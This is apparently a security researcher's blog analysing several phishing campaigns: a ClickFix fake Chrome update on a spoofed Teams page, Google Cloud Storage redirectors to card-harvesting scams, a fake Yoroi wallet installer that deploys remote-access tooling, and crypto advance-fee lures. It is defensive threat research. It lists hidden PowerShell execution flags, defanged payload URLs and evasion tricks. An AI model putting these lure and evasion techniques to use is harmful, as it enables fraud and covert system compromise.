Recently, I came across another ClickFix-style campaign pretending to install a Chrome security update. The campaign was hosted on:
teams-net-calls[.]com
The site impersonates a legitimate Microsoft Teams download page and attempts to trick users into manually executing a malicious PowerShell command under the guise of installing a browser security update.
When accessing the site, the victim initially sees what appears to be a legitimate Microsoft Teams download page. The page itself looks clean and convincing, using Microsoft branding and a fake Teams download interface.
However, the malicious behavior does not trigger immediately. The ClickFix flow is activated only after the user interacts with the page by clicking somewhere on it. After the click, the site displays a fake Chrome update popup claiming that a critical browser security update is required.
Requiring user interaction before displaying the malicious prompt may help the campaign avoid automated sandbox analysis and reduce detection by security crawlers that do not fully interact with page elements.
The popup then walks the user through a series of steps instructing them to manually execute a PowerShell command:
Press Win + X
Open PowerShell / Terminal
Paste the copied command
Press Enter
This social engineering approach avoids traditional browser download warnings because the victim manually executes the payload themselves.
After following the instructions, the victim ends up executing the following PowerShell command:
At first glance, the script looks somewhat harmless because it downloads a legitimate old Node.js package directly from the official Node.js website:
However, the second downloaded archive reveals the actual payload:
hxxps://instantwebupdate[.]com/get_update?i=77669
The script extracts both archives into:
C:\ProgramData\
and silently launches:
using hidden PowerShell execution flags such as:
-ExecutionPolicy Bypass -WindowStyle Hidden
The JavaScript payload itself is interesting because it uses a large fake “poem” style wordlist to hide embedded files. Instead of storing binaries directly, the malware reconstructs files from mapped words and writes them to disk during execution.
The bundled DLLs (msvcp140.dll, vcruntime140.dll, and vcruntime140_1.dll) appear to be legitimate Visual C++ runtime dependencies rather than standalone malicious DLLs. They were likely included to ensure the dropped executable runs properly on victim systems.
At the time of analysis, no obvious C2 URLs were identified inside the EXE itself. Most visible URLs were related to Microsoft or DigiCert certificate infrastructure.
While continuing to monitor the infrastructure used in that campaign, I discovered several additional URLs hosted on Google Cloud Storage (storage[.]googleapis[.]com) that appear to be part of the same ecosystem. These pages act as intermediate redirectors, sending victims to a wide variety of phishing and scam sites hosted primarily on the .autos TLD.
What is interesting is that a single Google Cloud Storage page appears to function as a central redirect hub, distributing victims across multiple scam themes such as fake surveys, reward scams, antivirus alerts, job offers, and account storage warnings.
Newly Observed Google Cloud Storage URLs
The following URLs were identified during the investigation:
These pages typically present users with messages claiming they have been selected for a Netflix reward or promotional giveaway, encouraging them to complete a short survey to claim their prize.
Like the other scams in this campaign, the pages ultimately attempt to collect personal or payment information, often under the pretext of paying a small shipping fee or verifying eligibility.
Fake Dell Laptop Giveaway Survey
Another variation promotes a Dell laptop giveaway, typically claiming that users can win a Dell 16 DC16250 laptop worth $699.99.
During testing, this page was observed redirecting users to multiple phishing domains across different scam themes.
This suggests it is functioning as a traffic distribution or redirect infrastructure, allowing attackers to rotate phishing destinations while keeping the initial delivery URL stable.
Using Google Cloud Storage also adds a layer of trust, as the domain belongs to a legitimate cloud provider.
Another interesting observation is that a single .autos domain can serve multiple phishing page themes after redirection from the Google Cloud Storage page. Depending on the redirection path or parameters, the same domain may host different scams such as:
Fake surveys
Reward scams
Storage full alerts
Antivirus subscription warnings
Job offer lures
This behavior indicates that the attackers are likely using a shared phishing kit or centralized backend infrastructure, allowing them to quickly rotate scam themes while reusing the same domains.
Another observation is the high volume of phishing emails currently being distributed using this infrastructure. Over the past few days, I have been receiving around 40–50 phishing emails within a 24-hour period, many of which contain links to Google Cloud Storage pages that act as redirectors to the phishing ecosystem described in this report.
This campaign demonstrates how attackers continue to abuse trusted cloud infrastructure such as Google Cloud Storage to host redirectors that distribute victims to multiple phishing pages.
By using legitimate cloud services as part of the attack chain, threat actors can increase credibility and reduce the likelihood of immediate blocking.
The use of large numbers of disposable .autos domains further allows attackers to rotate phishing pages frequently while keeping the delivery infrastructure intact.
In addition, the system appears to restrict repeated access attempts from the same IP address. After a user successfully reaches a phishing page through the redirector, subsequent attempts to access similar URLs from the same IP may result in the page failing to load or redirecting to unrelated sites. This behavior suggests the presence of IP-based filtering or traffic distribution logic, commonly used in malicious traffic distribution systems (TDS) to control how often a visitor can access the phishing infrastructure.
In recent weeks, a highly organized phishing campaign has surfaced, characterized by its use of legitimate Google infrastructure to bypass standard security filters. I have identified more than 25 distinct phishing emails targeting a single account, all of which ultimately direct users to a specific URL:
The URL in question is hosted on Google Cloud Storage (GCS). To the average user or basic email security gateway, the domain googleapis.com appears trustworthy because it is a legitimate Google-owned domain used for hosting cloud assets.
In this specific exploit:
The Bucket: whilewait is a unique storage container created by the attacker within a Google Cloud project.
The Payload: comessuccess.html is a script-heavy file designed to act as a “gatekeeper” or “redirector“.
By hosting the initial link on Google’s servers, the attackers ensure the email passes authentication checks like SPF and DKIM. Once a user clicks, the HTML file on Google’s server silently redirects the browser to a third-party malicious site, often used for credit card harvesting or malware distribution.
Diversity of Social Engineering Tactics
More than 25 emails captured in this study demonstrate an exhaustive range of “hooks” designed to appeal to different psychological triggers. While the underlying technical path is identical, the presentation varies wildly:
Security Fears: Alerts regarding a “Critical Threat Detected” or “Antivirus Protection Expired“.
Retail Incentives: Reward offers from brands such as Lowe’s, T-Mobile, and State Farm.
Lifestyle & Health: Promotions for “Homemade Recipes“, “Harry & David Gift Baskets“, “Blood Sugar Watch” or “Neuropathy Pain” solutions.
Despite these different themes, the goal remains consistent, drive traffic to the whilewait storage bucket to initiate a fraudulent transaction or steal sensitive information.
The Final Objective: Credit Card Harvesting
Following the redirect from the Google Cloud link, users are typically presented with a “shipping fee” or “service charge” for their reward or security update. This is the Credit Card (CC) Harvesting phase. Any payment information entered on these secondary sites is captured by the attackers, leading to immediate financial fraud. This specific lure mirrors the tactics identified in recent threat research (link given below), where scareware emails are increasingly used to push users toward these fraudulent “subscription” or “service” portals.
To defend against this specific style of “Trusted-Platform Phishing“, the following steps are recommended:
Inspect the Redirect Path: Be aware that a link starting with storage.googleapis.com is not an official communication from Google, it is a file hosted by a third party using Google’s tools.
Verify Sender Metadata: Even if the link looks legitimate, the “From” address in these 25 plus samples often consists of unrelated, randomized alphanumeric strings.
Submit Infrastructure Abuse Reports: These campaigns rely on the longevity of the storage bucket. Reporting the whilewaitbucket to the Google Cloud Abuse Team is the most effective way to dismantle the entire 25 plus email network at once.
I recently came across a phishing campaign impersonating the Yoroi Desktop Wallet, targeting cryptocurrency users with what looked like a legitimate upgrade.
The email itself was clean and well-written. It talked about improved security, hardware wallet support, and even AI-based scam detection. Nothing immediately stood out as suspicious. The landing page looked polished too, with proper branding and a familiar layout.
The Setup
The phishing email redirects users to a domain:
hxxps://download[.]v1desktop-yoroiwallet[.]com/
the domain was recently registered (Feb 2026), yet it was already indexed on Google, meaning users could also land on it via search results, not just email.
The Download That Isn’t a Wallet
The site promotes a “Yoroi Desktop” download, but instead of hosting anything legitimate, it redirects to a file-sharing service and delivers an MSI file:
Once executed, the system is quietly enrolled into a remote access setup. There’s no obvious warning, no suspicious pop-ups, just a legitimate tool being used in the wrong way.
Looking at the configuration reveals what’s happening behind the scenes:
This isn’t random. It shows the machine is being registered into a pre-configured remote access fleet, controlled by whoever owns that GoTo Resolve tenant.
At this point, the attacker doesn’t need to trick the user anymore. They already have what they need, persistent access to the device.
One thing that stands out across both campaigns is how the payload is delivered.
In all cases, the final MSI files are not hosted directly on the phishing domains. Instead, the sites redirect users to gofile[.]io, a legitimate file-sharing service, to download the installer.
This adds another layer of evasion. Hosting the MSI on a legitimate service like gofile makes it harder to block and also reduces suspicion from users, since the download doesn’t come directly from the phishing domain.
While digging further into this, I also noticed that the MSI files are hosted across multiple gofile storage endpoints such as:
store-na-phx-[1/4/5].gofile.io/download/direct/
Changing the server index (for example, 1, 4, or 5) reveals similar download paths hosting MSI files that follow the same theme, crypto wallet installers that actually deploy RMM tools.
Combined with the use of legitimate tools like GoTo Resolve (LogMeIn) and delivery through trusted file-sharing services, the overall chain appears clean on the surface but ultimately leads to full remote access.
I recently came across a message containing the following link:
hxxps://yandex[.]com/poll/PdZ7vgekGrNakuXZcpiB6b
At first, it didn’t look suspicious. It opened as a simple survey/poll page. But as I continued, the flow quickly shifted into a crypto reward scenario, claiming that I was eligible to receive a Bitcoin compensation payment.
And as expected with these kinds of lures, there’s a catch.
Before you can withdraw the funds, you’re asked to pay a small “commission” fee.
Full Scam Walkthrough (Video)
This gives a better idea of how smoothly the entire flow is designed to push the victim toward payment.
Infection / Lure flow
1.Initial Entry (Survey / Poll Page)
The flow starts with a Yandex poll link, which works as a kind of entry point.
This step likely serves multiple purposes. It helps make the interaction feel legitimate since it’s hosted on a known platform. It may also act as a basic filter to distinguish real users from automated systems. More importantly, it sets up the next stage of redirection.
2.Fake Bitcoin Compensation Page
After interacting with the poll, I was redirected to a page that looks like it belongs to a Bitcoin related service.
The page presents a sense of urgency by claiming that a new transaction of 0.943 BTC has been created and already marked as approved. It then introduces pressure by warning the user to withdraw the funds within 24 hours, a tactic commonly used to rush victims into taking immediate action without verifying the legitimacy of the claim.
This is where the emotional hook kicks in. Seeing a large amount like 0.943 BTC immediately grabs attention.
3. Social Engineering via Chat Assistant
Then a chat window appears, introducing a support agent.
The message explains that to complete the payment process, you need to register your profile in a compensation system. It sounds procedural and official, which is exactly the intention.
Shortly after, the real objective becomes clear.
You are asked to:
Pay $67 for legal profile registration services
4.Payment Gateway
Clicking the payment link takes you to a dedicated payment page.
Here, everything is carefully designed to appear legitimate and trustworthy. The page shows a specific payment amount of $67, provides a Bitcoin payment option via a QR code, and displays a wallet address to reinforce authenticity. On top of that, a countdown timer indicating invoice expiry adds urgency, subtly pressuring the user to complete the transaction quickly without questioning its validity.
The design mimics real crypto payment processors, which helps reduce suspicion.
The flow is quite structured and intentional.
It starts by engaging the user through a trusted platform, which lowers initial suspicion. Then it introduces a high-value crypto reward, creating excitement. A chat assistant adds a layer of interaction, making the process feel guided and legitimate.
Finally, the user is asked to pay a relatively small fee to unlock a much larger reward.
This is essentially an advance fee scam, adapted to fit into a crypto themed narrative.
Additional Variant Observed (Octa-Themed Flow)
While analyzing further, I encountered another link that follows the same backend scam logic, but with a different initial presentation.
The flow eventually leads to the same outcome, pay a commission to withdraw BTC.
Variant Walkthrough (Video)
1. Fake Account / Transfer Notification
This version starts with a fake dashboard impersonating Octa.
The page further attempts to lure users by displaying a message stating “You have a new money transfer”, along with a balance of 1.824 BTC. This presentation is crafted to create excitement and curiosity, making it seem like the user has unexpectedly received funds, while subtly encouraging them to engage with the page and follow the next steps without questioning its authenticity.
2. Fake Login & Temporary Password Flow
The user is asked to log in using a temporary password.
This step closely mimics real authentication flows to build trust and credibility. It displays a temporary password, includes an OTP style input field, and reinforces legitimacy with messaging like “Do not share this password!”. These familiar elements are designed to make the process feel secure and authentic, lowering suspicion while guiding the user further into the flow.
3. Transaction Dashboard
After logging in, the user is presented with a dashboard that appears highly convincing, displaying details such as the sender labeled as Octa, a balance of 1.824 BTC, and a status marked as paid. The layout, wording, and transaction details are all carefully crafted to create a sense of authenticity, making the entire interface look legitimate and encouraging the user to trust the process without suspicion.
4. Commission Justification
Before allowing any withdrawal, the platform introduces an additional requirement in the form of a commission fee of around $69, accompanied by an explanation about wallet limits and transfer rules. This step is designed to appear reasonable and procedural, giving the impression that the fee is a standard part of the process while subtly nudging the user to make a payment in order to access the supposed funds.
5. Payment Page
Just like the initial flow, the process ultimately leads to a familiar payment stage, presenting a Bitcoin payment request along with a QR code and a wallet address for convenience. An expiry timer is also displayed to create urgency, pressuring the user to act quickly and complete the payment without taking the time to question the legitimacy of the request.
What stands out is how the attackers reuse the same core scam but change the entry point.
I also looked into related activity on URLScan and found similar lures being actively scanned in the last couple of days, which indicates that this is not a one off campaign but something currently active and evolving.
Indicators of Compromise (IOCs)
URLs
Along with the observed infrastructure, I checked domain registration timelines, which further indicate that this campaign is relatively recent and actively being used.
